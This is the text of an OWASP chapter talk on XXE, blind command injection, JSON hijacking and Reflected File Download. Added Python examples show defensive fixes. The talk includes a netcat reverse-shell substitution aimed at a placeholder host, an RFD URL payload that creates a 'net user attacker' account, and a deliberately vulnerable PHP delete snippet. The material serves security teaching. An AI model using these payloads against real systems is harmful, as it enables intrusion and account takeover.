OWASP Pune Chapter: Dive Into The Profound Web Attacks

Posted on 20-Jan-2017


Narendra Bhati - Security Analyst
narendra.bhati@outlook.com

Dive Into The Profound Web Attacks

OWASP Pune Chapter – 18th Feb 2016

Speaker: Narendra Bhati, Security Analyst @ Suma Soft Pvt. Ltd. – Pune

Researcher & part-time bug bounty hunter. Listed in the Hall of Fame for reporting security vulnerabilities to Facebook, Google, Mozilla, Twitter etc. Holds more than 12 CVEs & 3 zero-day vulnerabilities.

Blog – http://websecgeeks.com

“Who Am I - r00tsh3ll”

If you have any questions or queries regarding the talk, kindly note them down so we can discuss them at the end.

Dive Into The Profound Web Attacks

• XXE ( XML External Entity Injection)

• Blind RCE ( Blind Remote/OS Command Execution )

• JSON Response Hijacking

• Reflected File Download

• XXE ( XML External Entity Injection)


• XXE ( XML External Entity Injection)

According To OWASP

An XML External Entity attack is a type of injection attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data.

• XXE ( XML External Entity Injection)

Why does XXE take place?

Failure to validate external XML entities, which gives an attacker access to internal resources/data.

• XXE ( XML External Entity Injection)

Let's Have A Demo!

• XXE ( XML External Entity Injection)

Getting a connection from the target domain

Accessing internal directories. By brute forcing (or otherwise) we found a directory on localhost called “/betatesting/testing.php”, which is a network utility.

Invalid directory: the response contains “failed to load external entity”.

Valid directory: the response does not contain “failed to load external entity”, or there is some other difference between the valid and invalid directory responses.

• XXE ( XML External Entity Injection)


I am leaving out the rest of the process. Based on the “testing.php” response, we added a GET parameter called “ping” and we were able to execute commands.

This is a scenario where the target system has some beta-testing application that is under development. You should figure out what you can do with XXE or any other vulnerability.

• XXE ( XML External Entity Injection)

Fixing The XXE

Disable external entity loading in the XML parser in order to prevent XXE.

For PHP: bool libxml_disable_entity_loader ([ bool $disable = true ] )

For .NET: settings.XmlResolver = null;

Look for the equivalent setting in other languages as well.
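The same idea as the PHP and .NET settings above, as an added example that is not part of the talk: a parser that refuses any DOCTYPE, entity declaration or external entity reference before it can be resolved. It uses only Python's standard-library expat parser; the sample documents (a plain `<user>` record and an XXE probe pointing at `file:///etc/hostname`) are constructed for this example. On PHP 8, note that `libxml_disable_entity_loader()` is deprecated because libxml 2.9 and later no longer load external entities by default; the parser-level refusal below is the equivalent control.

```python
import xml.parsers.expat as expat


class DTDForbidden(ValueError):
    """Raised when the input carries a DOCTYPE, an entity declaration
    or a reference to an external entity."""


def parse_without_entities(data: bytes) -> dict:
    """Parse XML with the stdlib expat parser and return {tag: text}.

    Any DOCTYPE or entity declaration aborts the parse with DTDForbidden.
    This is the same idea as libxml_disable_entity_loader() in PHP or
    XmlResolver = null in .NET: the parser never gets a chance to fetch
    file:// or http:// resources named in an entity.
    """
    parser = expat.ParserCreate()
    # Never fetch parameter entities (external DTD subsets).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def forbid_doctype(name, sysid, pubid, has_internal_subset):
        raise DTDForbidden(f"DOCTYPE '{name}' rejected (SYSTEM={sysid!r})")

    def forbid_entity(*_args):
        raise DTDForbidden("entity declaration rejected")

    def forbid_external(context, base, sysid, pubid):
        raise DTDForbidden(f"external entity {sysid!r} rejected")

    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.EntityDeclHandler = forbid_entity
    parser.ExternalEntityRefHandler = forbid_external

    elements = {}   # tag -> accumulated character data
    stack = []      # names of the currently open elements

    def start(name, attrs):
        stack.append(name)
        elements.setdefault(name, "")

    def chars(text):
        if stack:
            elements[stack[-1]] += text

    def end(name):
        stack.pop()

    parser.StartElementHandler = start
    parser.CharacterDataHandler = chars
    parser.EndElementHandler = end
    parser.Parse(data, True)
    return {tag: text.strip() for tag, text in elements.items()}


def check_upload(data: bytes) -> str:
    """Policy wrapper for an upload handler: 'accepted' or 'rejected: <reason>'."""
    try:
        parse_without_entities(data)
    except DTDForbidden as exc:
        return f"rejected: {exc}"
    except expat.ExpatError as exc:
        return f"rejected: malformed XML ({exc})"
    return "accepted"


# Constructed sample inputs (not taken from the talk's demo).
BENIGN = b"<user><name>alice</name><role>tester</role></user>"
XXE_PROBE = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>'
    b"<foo>&xxe;</foo>"
)

if __name__ == "__main__":
    print(parse_without_entities(BENIGN))   # {'user': '', 'name': 'alice', 'role': 'tester'}
    print(check_upload(XXE_PROBE))          # rejected: DOCTYPE 'foo' rejected (SYSTEM=None)
```

The rejection happens in the DOCTYPE handler, before expat has seen the entity itself, so the `file://` reference is never touched; the `ExternalEntityRefHandler` is a second line of defence for documents that reference an entity declared elsewhere.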


Blind RCE ( Blind Remote/OS Command Execution )


Blind RCE ( Blind Remote/OS Command Execution )

In nature and behaviour it is similar to (the elder brother of) the Blind SQL Injection vulnerability.

According To OWASP

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application.

Blind RCE ( Blind Remote/OS Command Execution )

Why does RCE take place?

Missing or insufficient sanitization of user input that is appended to a system shell command at execution time.

Blind RCE ( Blind Remote/OS Command Execution )

Ex. Vulnerable code (PHP):

<?php
print("Please specify the name of the file to delete");
print("<p>");
$file = $_GET['filename'];   // injection point: unsanitized user input
system("rm $file");          // interpolated straight into a shell command
?>

Blind RCE ( Blind Remote/OS Command Execution )

Some basics about chaining commands

• A; B = Run A and then B, regardless of whether A succeeded

• A || B = Run B only if A failed; A always runs first

• A && B = Run B only if A succeeded; if A failed, B will not execute

• A & B = Run A in the background and B in the foreground; B runs even if A fails

• A | B = Run A and pass the output of A to B as its input

• A %0a B = URL-encoded newline as a separator (useful for web apps)

• $(nc -nv ip port -e /bin/bash) = command substitution

Blind RCE ( Blind Remote/OS Command Execution )

Demo Time

Normal RCE | Some Bypasses | Blind RCE [Low-Medium]


Blind RCE ( Blind Remote/OS Command Execution )

Detection via time-delayed response

Response comes in approx. 4 sec.

Response comes in approx. 11 sec.
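The same timing signal, seen from the defender's side, as an added example that is not part of the talk: a scan over access-log lines that flags requests whose decoded query values contain one of the separators listed above and whose response time is far above the median for clean requests to the same path. The log format (client IP, request line, status, request time in seconds) and all six lines are constructed for this example; the `/tools/ping.php` path is an assumed name, not the talk's target.

```python
import re
import statistics
from urllib.parse import parse_qsl

# Constructed access-log lines in a reduced nginx-style format:
# client ip, request line, status, $request_time in seconds.
SAMPLE_LOG = """\
10.0.0.5 "GET /tools/ping.php?host=10.0.0.1 HTTP/1.1" 200 4.02
10.0.0.5 "GET /tools/ping.php?host=10.0.0.1 HTTP/1.1" 200 3.97
10.0.0.9 "GET /tools/ping.php?host=10.0.0.1%3Bsleep%207 HTTP/1.1" 200 11.10
10.0.0.9 "GET /tools/ping.php?host=10.0.0.1%0asleep%207 HTTP/1.1" 200 11.04
10.0.0.9 "GET /tools/ping.php?host=10.0.0.1%3Bid HTTP/1.1" 200 4.01
10.0.0.7 "GET /index.php HTTP/1.1" 200 0.03
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<rt>[\d.]+)$'
)
# The separators from the slide above, as they look after URL decoding.
SEPARATORS = ("\n", ";", "||", "&&", "&", "|", "`", "$(")


def parse_line(line):
    """Split one log line into fields; query values are URL-decoded once."""
    m = LINE_RE.match(line)
    if not m:
        return None
    row = m.groupdict()
    path, _, query = row["target"].partition("?")
    row["path"] = path
    # parse_qsl splits on the raw '&' first, so an encoded %26 inside a value
    # is still visible as a separator after decoding.
    row["values"] = [v for _, v in parse_qsl(query, keep_blank_values=True)]
    row["rt"] = float(row["rt"])
    return row


def has_separator(values):
    return any(sep in v for v in values for sep in SEPARATORS)


def find_time_based_injection(log_text, slowdown=2.0):
    """Flag requests that carry a shell separator AND took at least `slowdown`
    times the median of clean requests to the same path.

    Returns {"timing": [(line_no, ip, values, rt), ...],
             "metachar_only": [(line_no, ip, values, rt), ...]}.
    """
    rows = [r for r in (parse_line(l) for l in log_text.splitlines()) if r]
    baseline = {}
    for r in rows:
        if not has_separator(r["values"]):
            baseline.setdefault(r["path"], []).append(r["rt"])

    result = {"timing": [], "metachar_only": []}
    for line_no, r in enumerate(rows, start=1):
        if not has_separator(r["values"]):
            continue
        clean = baseline.get(r["path"])
        hit = (line_no, r["ip"], r["values"], r["rt"])
        if clean and r["rt"] >= slowdown * statistics.median(clean):
            result["timing"].append(hit)
        else:
            result["metachar_only"].append(hit)
    return result


if __name__ == "__main__":
    for kind, hits in find_time_based_injection(SAMPLE_LOG).items():
        for hit in hits:
            print(kind, hit)
```

Lines 3 and 4 land in `timing` (separator plus an 11-second response against a 4-second baseline); line 5 carries a separator but returned at normal speed, so it is reported separately as `metachar_only`, which is the bucket to review for blind injection that exfiltrates output instead of sleeping.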

Blind RCE ( Blind Remote/OS Command Execution )


In the demonstration, we assume that the target server is configured so that it will not send a reverse connection using netcat's -e option, and we cannot use wget either.

The response from the command “id” is logged in our Python simple HTTP server.

Let's see whether we are able to access the /var/tmp folder. Yes, we are, because the Python server received the response /var/tmp.

Using a similar approach, we can interact with the shell output. Remember, we are not using netcat's -e option for the response; we are just piping the output to another machine.

Blind RCE ( Blind Remote/OS Command Execution )

Fixing The Command Execution

• The developer should scrub all input for malicious characters.

• It is much easier to define the legal characters than the illegal characters.

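The two fixing bullets above (scrub input; define the legal characters rather than the illegal ones) applied to the PHP delete example, as an added example that is not part of the talk: an allow-list for the file name, and the delete built as an argv list so no shell ever parses the value. The upload directory `/var/app/uploads` and the `dry_run` runner are assumptions for this example.

```python
import re
import subprocess
from pathlib import PurePosixPath

# Assumed directory that holds the user's files (not from the talk).
UPLOAD_DIR = PurePosixPath("/var/app/uploads")

# Allow-list: what a legal file name looks like. Everything else is rejected,
# which is easier to get right than enumerating ; | & $ ( ) ` newline ...
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")


def vulnerable_command(filename):
    """The shell string the PHP snippet above builds: the raw parameter is
    interpolated, so 'report.txt; id' becomes two commands once a shell parses it."""
    return f"rm {filename}"


def validate_filename(filename):
    """Return the name unchanged if it matches the allow-list, else raise."""
    if not SAFE_NAME.fullmatch(filename):
        raise ValueError(f"filename rejected: {filename!r}")
    return filename


def is_acceptable(filename):
    try:
        validate_filename(filename)
        return True
    except ValueError:
        return False


def safe_delete_argv(filename):
    """Build the argv for the delete. The name can only contain allow-listed
    characters, so it can neither leave UPLOAD_DIR nor look like an option."""
    name = validate_filename(filename)
    target = UPLOAD_DIR / name
    assert target.parent == UPLOAD_DIR   # belt and braces; no '/' passes the regex
    return ["rm", "--", str(target)]


def dry_run(argv, check=False):
    """Stand-in runner that records the argv instead of executing it."""
    return subprocess.CompletedProcess(argv, 0)


def delete_upload(filename, run=subprocess.run):
    """Run the delete without a shell: the argv goes to execve(), so none of
    the separators from the slide above is ever interpreted."""
    completed = run(safe_delete_argv(filename), check=False)
    return completed.returncode


if __name__ == "__main__":
    print(vulnerable_command("report.txt; id"))        # rm report.txt; id
    print(safe_delete_argv("report.txt"))              # ['rm', '--', '/var/app/uploads/report.txt']
    print(is_acceptable("report.txt; id"))             # False
    print(delete_upload("report.txt", run=dry_run))    # 0
```

Rejecting rather than stripping matters: stripping `;` from `report.txt; id` would silently turn an attack into a different file name, while the allow-list gives one answer (refuse) for every separator, including ones the deny-list never thought of.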

JSON Response Hijacking


JSON Response Hijacking

According To Sources

Similar to CSRF, this vulnerability is based on a browser bug that allows an attacker to steal a sensitive JSON response from a victim's authenticated session, or to do more interesting things.

JSON Response Hijacking

JSON hijacking happens if the endpoint:

Source - http://haacked.com/archive/2009/06/25/json-hijacking.aspx/

• returns sensitive data.

• returns a JSON array [content-type JSON].

• responds to GET requests.

• is requested by a browser that has JavaScript enabled (and supports the __defineSetter__ method).

JSON Response Hijacking

Let's Dive Into The Demo

JSON Response Hijacking

Fixing JSON Hijacking

Source - http://haacked.com/archive/2009/06/25/json-hijacking.aspx/

• Only return JSON objects to POST requests.

• Prevent the web browser from interpreting the JSON object as valid JavaScript code.

• Implement CSRF protection (random tokens) for all JSON requests.
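The three fixes above in one server-side handler, as an added example that is not part of the talk or of the haacked.com article: refuse GET, require a per-session CSRF token sent in a custom header, wrap the array in an object, and prefix the body with `)]}',\n` so it is a JavaScript syntax error if loaded as a script (a convention used by Google APIs and stripped by AngularJS's `$http`; the prefix is my choice here, not the talk's). Modern browsers no longer let a page hijack array literals through the Array constructor or setters, but these controls remain standard practice. The session token and `ACCOUNTS` data are constructed.

```python
import hmac
import json
import secrets

# Prefix that makes the body a JavaScript syntax error if a cross-site page
# ever manages to load it with <script src=...>; the legitimate client strips it.
JSON_PREFIX = ")]}',\n"


def new_session_token():
    """Per-session CSRF token; the server stores it and the page sends it back
    in a custom header, which a cross-origin <script> tag cannot set."""
    return secrets.token_hex(16)


def json_response(method, csrf_header, session_token, payload):
    """Return (status, headers, body) for an endpoint that serves sensitive JSON.

    Applies the three fixes from the slide: refuse GET, require a CSRF token,
    and never let the body parse as a JavaScript array literal.
    """
    if method.upper() != "POST":
        return 405, {"Allow": "POST"}, ""
    if not csrf_header or not hmac.compare_digest(csrf_header, session_token):
        return 403, {}, ""
    body = JSON_PREFIX + json.dumps({"data": payload})   # object wrapper, never a bare array
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        "X-Content-Type-Options": "nosniff",   # browsers refuse to execute a non-script MIME type
        "Cache-Control": "no-store",
    }
    return 200, headers, body


def parse_guarded_json(body):
    """Client-side counterpart: strip the prefix, then decode."""
    if not body.startswith(JSON_PREFIX):
        raise ValueError("missing anti-hijack prefix")
    return json.loads(body[len(JSON_PREFIX):])


# Constructed sample data (not from the talk's demo).
SESSION_TOKEN = new_session_token()
ACCOUNTS = [{"id": 1, "email": "alice@example.test"}]

if __name__ == "__main__":
    print(json_response("GET", SESSION_TOKEN, SESSION_TOKEN, ACCOUNTS)[0])     # 405
    print(json_response("POST", "wrong", SESSION_TOKEN, ACCOUNTS)[0])          # 403
    status, headers, body = json_response("POST", SESSION_TOKEN, SESSION_TOKEN, ACCOUNTS)
    print(status, parse_guarded_json(body))                                    # 200 {'data': [...]}
```

Each control closes one of the conditions from the previous slide: the POST requirement removes "responds to GET", the object wrapper and prefix remove "returns a JSON array" that a browser could evaluate, and the token check means even a forced request returns nothing useful.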

Reflected File Download


Reflected File Download

According To Sources

RFD is a web attack vector that enables attackers to gain complete control over a victim's machine by virtually downloading a file from a trusted domain. Recently found in Facebook & Google etc. by researchers.

Source - https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf

Reflected File Download

Let's Separate Those Words

Reflected: the value given in the URL should be reflected in the response.

Filename: the file name handling should be permissive, i.e. it should also accept additional user-controlled values and file types. For example, the application may accept a filename between the first slash “/” and the “?” character. Ex. Code (PHP) (Will Not Work)

Reflected File Download

Download:

https://anyvulnerablewebsite.com/json;/maliciousfile.bat/.exe?download=anycommand (saved as “malicious.bat/.exe”)

So basically this is browser behaviour: how the browser handles the download process. The behaviour mentioned is for Chrome; other browsers may behave differently.

Reflected File Download

Attack Scenario

1. The attacker sends the victim a malicious URL on a trusted domain.

Ex. http://anytrustedsite.com/apitest/search;setup.bat?term=f00bar&callback=net user attacker attacker

2. The victim sees that the domain is trusted, so he accesses the URL.

3. After clicking the URL, the file is downloaded, and after executing that file, something interesting happens. ;)

Reflected File Download

Let's See A Demo

Reflected File Download

As you can see, we have a web application. The value of the download parameter is returned in the response without a filename header, and the response is downloadable.

Reflected File Download

Now we are going to enter a file name in the URL. Because the response header does not carry a file name, we have a chance to control the file name from the URL itself.

Reflected File Download

Now we can craft a payload as input that will execute a system command on the victim's machine. Based on the reflection, we can separate out the rest of the value to perform command execution.

Reflected File Download

After executing that file, we have calc execution.

Reflected File Download

Create some more interesting payload. Before doing so, let's check the user accounts.

Reflected File Download

After executing the downloaded file, we have another user account called “attacker”.

Reflected File Download

Fixing The Reflected File Download

Add - Content-Disposition: attachment; filename=anyfile.pdf/txt

Don't allow the application to take permissive input.

Limit the callback function for “;:/” characters.
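The three RFD fixes above applied to a JSONP search endpoint like the one in the attack scenario, as an added example that is not part of the talk: a server-chosen `Content-Disposition` file name with a non-executable extension (so a `;setup.bat` path segment no longer names the download), a strict identifier allow-list for the callback (tighter than only excluding `;`, `:` and `/`), and JSON-encoding of the reflected term. The endpoint shape, the `search.json` name and the allowed-extension set are assumptions for this example.

```python
import json
import re

# JSONP callback names: a strict identifier allow-list. It rejects the
# "net user attacker attacker" style value from the attack-scenario URL
# as well as anything carrying ; : / or whitespace.
CALLBACK_RE = re.compile(r"[A-Za-z_$][A-Za-z0-9_$]{0,63}")

# Fixed, non-executable download names the API is allowed to hand out.
ALLOWED_EXTENSIONS = {"json", "txt", "csv", "pdf"}
FILENAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}\.([a-z0-9]{1,5})")


def is_valid_callback(name):
    return bool(name) and CALLBACK_RE.fullmatch(name) is not None


def is_allowed_download_name(filename):
    m = FILENAME_RE.fullmatch(filename or "")
    return m is not None and m.group(1) in ALLOWED_EXTENSIONS


def content_disposition(filename):
    """Build the header from a server-chosen name; never from the URL path,
    which is what the browser falls back to when this header is absent."""
    if not is_allowed_download_name(filename):
        raise ValueError(f"download name not allowed: {filename!r}")
    return f'attachment; filename="{filename}"'


def api_response(callback, term):
    """(status, headers, body) for a search endpoint that reflects `term`
    inside a JSONP callback.

    The reflected term is JSON-encoded (quotes and control characters are
    escaped), the callback is validated, and Content-Disposition fixes the
    file name so user-controlled path segments cannot name the download.
    """
    if not is_valid_callback(callback):
        return 400, {}, ""
    body = f"{callback}({json.dumps({'term': term, 'results': []})});"
    headers = {
        "Content-Type": "application/javascript; charset=utf-8",
        "Content-Disposition": content_disposition("search.json"),
        "X-Content-Type-Options": "nosniff",
    }
    return 200, headers, body


if __name__ == "__main__":
    print(api_response("jQuery123_cb", "f00bar"))
    print(api_response("net user attacker attacker", "f00bar")[0])   # 400
    print(is_allowed_download_name("setup.bat"))                       # False
```

The header is the control that survives browser differences: whatever the browser would otherwise derive from the path, a `Content-Disposition` with an explicit `.json` name decides what lands on disk, and the callback allow-list removes the reflected, unencoded value that the downloaded file would otherwise contain.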

Thanks for listening peacefully.

Kindly send me your feedback regarding the talk to narendra.bhati@outlook.com. It will help me to improve the presentation next time.